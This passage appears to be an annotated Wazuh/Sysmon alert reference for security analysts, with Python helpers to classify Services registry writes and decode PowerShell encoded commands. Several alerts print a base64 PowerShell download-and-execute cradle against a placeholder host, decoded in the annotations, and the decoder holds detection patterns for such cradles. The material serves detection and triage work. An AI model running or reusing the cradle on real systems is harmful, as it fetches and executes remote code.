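    """Split the 'v2.xx|Key=Value|...' serialisation Windows stores under FirewallRules."""
    parts = details.split("|")
    rule = {"version": parts[0]}
    for part in parts[1:]:
        if part:
            key, _, value = part.partition("=")
            rule[key] = value
    if "Protocol" in rule:
        rule["Protocol"] = IP_PROTO.get(rule["Protocol"], rule["Protocol"])
    return rule


def classify_services_write(event):
    """Return what kind of Services\\ write this is and the checks worth running on it."""
    target = event["targetObject"]
    image = event["image"].lower()
    if not target.lower().startswith(SERVICES_ROOT.lower()):
        return {"kind": "not_services"}
    segments = target[len(SERVICES_ROOT):].split("\\")
    result = {"service_name": segments[0], "writer": image, "user": event["user"]}

    if segments[0].lower() == "sharedaccess" and "FirewallRules" in segments:
        rule = parse_firewall_rule(event["details"])
        result.update(
            kind="firewall_rule",
            rule=rule,
            inbound_allow=rule.get("Dir") == "In" and rule.get("Action") == "Allow",
            # The firewall service (MpsSvc) runs inside svchost.exe as LOCAL SERVICE;
            # any other writer (reg.exe, a script) deserves a closer look.
            writer_is_firewall_svc=image.endswith("\\svchost.exe")
            and event["user"].upper().endswith("LOCAL SERVICE"),
        )
        return result

    if len(segments) == 2 and segments[1].lower() == "imagepath":
        raw = event["details"].strip()
        quoted = raw.startswith('"')
        binary = raw.strip('"') if quoted else raw
        exe_prefix = binary.lower().split(".exe")[0]
        result.update(
            kind="service_imagepath",
            binary=binary,
            # services.exe is the SCM: it writes this key for every CreateService
            # caller, so it tells you nothing about who requested the service.
            writer_is_scm=image.endswith("\\services.exe"),
            unquoted_path_with_space=(not quoted) and (" " in exe_prefix),
        )
        return result

    result["kind"] = "other_service_value"
    return result


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify_services_write(ev))
```

A Wazuh child rule that excludes targetObject values containing \SharedAccess\Parameters\FirewallPolicy\ from 92307, or routes them to a separate firewall-change rule, removes the first kind of hit without losing the second; the ImagePath hits remain the ones that need the 7045 and process-tree correlation described above.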
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.770075 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: the Sysmon driver, again reporting a process creation.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon’s fixed provider GUID; a locale-independent filter key.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Schema version of the ProcessCreate event (version 5 carries ParentUser).
data.win.system.level: 4 Windows event level; 4 = Informational, which is all Sysmon ever uses.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:31.7625296Z When the record was written to the channel (UTC), about 1.4 s after eventdata.utcTime; timeline on the latter.
data.win.system.eventRecordID: 280554 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the new process (that is eventdata.processId).
data.win.system.threadID: 4740 Logging thread inside the Sysmon service. Forensic noise.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from.
data.win.system.computer: Attacker Hostname that recorded the event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:30.374
ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00}
ProcessId: 11408
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc37-680a-320a-000000000e00}
ParentProcessId: 4172
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Full rendered Sysmon ProcessCreate message; the same content as the eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:33:30.374 When Sysmon saw this process start (UTC), 18 seconds after the first encoded-command alert.
data.win.eventdata.processGuid: {94294ddc-bc3a-680a-340a-000000000e00} A new Sysmon process GUID (embedded start time 0x680abc3a = 22:33:30Z), so this is a fresh instance, not a re-report of PID 11012.
data.win.eventdata.processId: 11408 PID of this instance.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Same 64-bit powershell.exe as in the first alert.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the binary; unchanged.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Internal file name compiled into the PE; matches image, so the binary was not renamed.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Byte-identical to the 22:33:12 alert: the doubled image path followed by the same encoded download cradle, IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). Two launches of the same payload 18 seconds apart point at a loop or a retry, not a one-off.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Same working directory (user profile root).
data.win.eventdata.user: Attacker\\Attcker1 Same account as before.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Same logon session as the first alert, so one interactive session is driving all of this.
data.win.eventdata.logonId: 0x26584 Same logon session ID as the first alert.
data.win.eventdata.terminalSessionId: 1 Interactive session.
data.win.eventdata.integrityLevel: Medium Still not elevated.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Same SHA256 as the first alert, so the same on-disk binary.
data.win.eventdata.parentProcessGuid: {94294ddc-bc37-680a-320a-000000000e00} A different parent from the first alert (embedded start time 0x680abc37 = 22:33:27Z). Its own EID1 record is not among the alerts here; pull it by this GUID.
data.win.eventdata.parentProcessId: 4172 PID of this parent.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe PowerShell spawning PowerShell again.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Identical to the child’s command line, as in the first alert.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.778141 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Sysmon here, so eventID below is a Sysmon ID, not a Security-log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; this value is Sysmon's and is the same on every host.
data.win.system.eventID: 11 Event ID within the provider. For Sysmon: 1 = Process Create, 3 = Network Connection, 11 = File Create. Not comparable with Security-log IDs like 4624 or 4688.
data.win.system.version: 2 Schema version of this event type; it increments when Sysmon adds fields, so parsers that key on field position should check it.
data.win.system.level: 4 Event level; 4 = Informational. Sysmon logs everything at this level, so severity comes from the Wazuh rule, not from here.
data.win.system.task: 11 Task category; for Sysmon events it equals the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:32.4979169Z When the record was written to the channel (UTC). Compare with data.win.eventdata.utcTime to see logging lag.
data.win.system.eventRecordID: 280555 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process the event describes. It is 3712 in every Sysmon alert from this host.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent collected this from; it has to be configured as an eventchannel localfile in the agent's ossec.conf.
data.win.system.computer: Attacker Hostname recorded in the event. Should equal agent.name; a mismatch means forwarded or relabelled logs.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:33:32.489
ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00}
ProcessId: 11408
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tejp41b.qrm.ps1
CreationUtcTime: 2025-04-24 22:33:32.489
User: Attacker\Attcker1" Closing line of the rendered Sysmon message; the same fields are parsed into the data.win.eventdata.* keys below.
data.win.eventdata.utcTime: 2025-04-24 22:33:32.489 Time Sysmon observed the file being created (UTC).
data.win.eventdata.processGuid: {94294ddc-bc3a-680a-340a-000000000e00} Sysmon GUID of the creating process. It is the same GUID (and PID 11408) as the powershell.exe in the Process Create alert above that carried the -EncodedCommand, so this file drop belongs to that process.
data.win.eventdata.processId: 11408 PID of the creating process; reused after exit, so join on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tejp41b.qrm.ps1 Path of the new file. powershell.exe writes a __PSScriptPolicyTest_<random>.ps1 into %TEMP% at startup to test whether AppLocker/WDAC script enforcement applies to it, so this particular file is a startup artifact, not a dropped payload. Rule 92213 keyed on "script written to Temp"; the useful lead is the creating process, not the file.
data.win.eventdata.creationUtcTime: 2025-04-24 22:33:32.489 Creation timestamp on the file. For a freshly written file it equals utcTime; a large gap suggests the timestamp was altered.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.780909 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event (Sysmon), so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's provider GUID; constant across hosts.
data.win.system.eventID: 1 Sysmon event ID: 1 = Process Create. Not a Security-log ID.
data.win.system.version: 5 Schema version of the Process Create event; newer Sysmon builds added fields such as ParentUser.
data.win.system.level: 4 Event level; 4 = Informational. Severity comes from the Wazuh rule.
data.win.system.task: 1 Task category; equals the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:46.6613401Z When the record was written to the channel (UTC); about a second after the utcTime in the event body.
data.win.system.eventRecordID: 280712 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process described.
data.win.system.threadID: 4740 Thread inside the Sysmon service; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent collected this from.
data.win.system.computer: Attacker Hostname recorded in the event; should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:45.664
ProcessGuid: {94294ddc-bc49-680a-410a-000000000e00}
ProcessId: 6832
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc47-680a-3f0a-000000000e00}
ParentProcessId: 7368
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Closing line of the rendered Sysmon message; the same fields are parsed into the data.win.eventdata.* keys below.
data.win.eventdata.utcTime: 2025-04-24 22:33:45.664 Time Sysmon recorded the process start (UTC).
data.win.eventdata.processGuid: {94294ddc-bc49-680a-410a-000000000e00} Sysmon GUID for this process; join key for everything it goes on to do.
data.win.eventdata.processId: 6832 Windows PID at creation time; reused later, so join on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that started.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the PE version resource.
data.win.eventdata.description: Windows PowerShell Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the PE version resource; forgeable, confirm with the hash.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name compiled into the binary; matches image, so nothing was renamed.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Same encoded command as the 22:33:30 alert above: base64 over UTF-16LE of IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. This is what rule 92057 matched on.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory: the user's profile.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon GUID of the logon session. Same value as in the 22:33:30 alert, so one logon session is producing all of these launches.
data.win.eventdata.logonId: 0x26584 Windows logon ID; matches the Logon ID in Security event 4624 for this session.
data.win.eventdata.terminalSessionId: 1 Interactive desktop session (0 would be services).
data.win.eventdata.integrityLevel: Medium Standard, non-elevated token.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC SHA256 of powershell.exe on disk; same binary as in the earlier alert.
data.win.eventdata.parentProcessGuid: {94294ddc-bc47-680a-3f0a-000000000e00} Sysmon GUID of the parent; pivot on it to find the parent's own Process Create event.
data.win.eventdata.parentProcessId: 7368 PID of the parent at creation time.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent is another powershell.exe.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line, identical to the child's: each encoded PowerShell launches another with the same command. Walk parentProcessGuid upwards until the parent is no longer powershell.exe to find what started the chain.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
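The -EncodedCommand blob in the PowerShell alerts above is the part an analyst actually has to read, and it is base64 over UTF-16LE, not plain base64, so a generic base64 decoder shows interleaved NUL bytes. The following Python is an added example, not Wazuh code and not part of the original alert dump: it pulls the blob out of the commandLine field (accepting the short -e, -ec and -enc spellings that powershell.exe also allows), decodes it, and flags the pieces of a download cradle. The alert dict is constructed from the fields shown above and trimmed to what the code reads; the indicator names and verdict strings are this example's own.

```python
"""Decode a PowerShell -EncodedCommand from a Sysmon EID 1 alert and flag download-cradle patterns.

Added example for this alert dump; it is not Wazuh code. SAMPLE_ALERT is constructed from the
data.win.eventdata fields shown above (JSON escaping removed), reduced to the fields read here.
"""
import base64
import binascii
import re
from typing import Optional

SAMPLE_ALERT = {
    "rule": {"id": "92057"},
    "data": {"win": {"eventdata": {
        "processGuid": "{94294ddc-bc49-680a-410a-000000000e00}",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "commandLine": (
            r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
            r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
            "-NoLogo -NoProfile -EncodedCommand "
            "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
            "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
            "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
        ),
    }}},
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# case-insensitively, so matching only the full spelling misses the short forms attackers use.
# -ExecutionPolicy / -ep do not match because no whitespace follows the "-e".
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Building blocks of a download cradle: fetch remote text, then evaluate it in memory.
CRADLE_INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "webclient-download": re.compile(r"net\.webclient|download(?:string|file|data)", re.IGNORECASE),
    "web-request": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.IGNORECASE),
    "nested-base64": re.compile(r"frombase64string", re.IGNORECASE),
}
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand (any accepted prefix), or None if absent."""
    match = ENCODED_ARG.search(command_line)
    return match.group(1) if match else None


def decode_encoded_command(blob: str) -> Optional[str]:
    """PowerShell base64-encodes the script as UTF-16LE; decode it, or return None if malformed.

    Bad padding, non-alphabet characters, or an odd byte count that cannot be UTF-16 all yield
    None instead of an exception, so a batch run over many alerts does not stop on one bad blob.
    """
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_alert(alert: dict) -> dict:
    """Decode the command line of a Wazuh/Sysmon EID 1 alert and summarise what it does."""
    eventdata = alert.get("data", {}).get("win", {}).get("eventdata", {})
    blob = extract_encoded_command(eventdata.get("commandLine", ""))
    decoded = decode_encoded_command(blob) if blob else None
    indicators = [name for name, rx in CRADLE_INDICATORS.items() if decoded and rx.search(decoded)]
    urls = URL_RE.findall(decoded) if decoded else []
    fetches = "webclient-download" in indicators or "web-request" in indicators
    if "invoke-expression" in indicators and (fetches or urls):
        verdict = "download cradle"
    elif blob:
        verdict = "encoded command"
    else:
        verdict = "no encoded command"
    return {
        "processGuid": eventdata.get("processGuid"),
        "encoded": blob is not None,
        "decoded": decoded,
        "indicators": indicators,
        "urls": urls,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in analyze_alert(SAMPLE_ALERT).items():
        print(f"{key}: {value}")
```

The decoded script is the text to put in the case notes and to hunt for on other hosts; the URL list is what goes to the proxy and DNS logs. Note that an encoded command that decodes cleanly but matches no indicator still gets the "encoded command" verdict: encoding on its own is a reason to look, not a verdict.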
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.788971 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event (Sysmon), so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's provider GUID; constant across hosts.
data.win.system.eventID: 1 Sysmon event ID: 1 = Process Create. Not a Security-log ID.
data.win.system.version: 5 Schema version of the Process Create event.
data.win.system.level: 4 Event level; 4 = Informational. Severity comes from the Wazuh rule.
data.win.system.task: 1 Task category; equals the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:51.1645018Z When the record was written to the channel (UTC).
data.win.system.eventRecordID: 280763 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of net.exe.
data.win.system.threadID: 4740 Thread inside the Sysmon service; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent collected this from.
data.win.system.computer: Attacker Hostname recorded in the event; should equal agent.name.
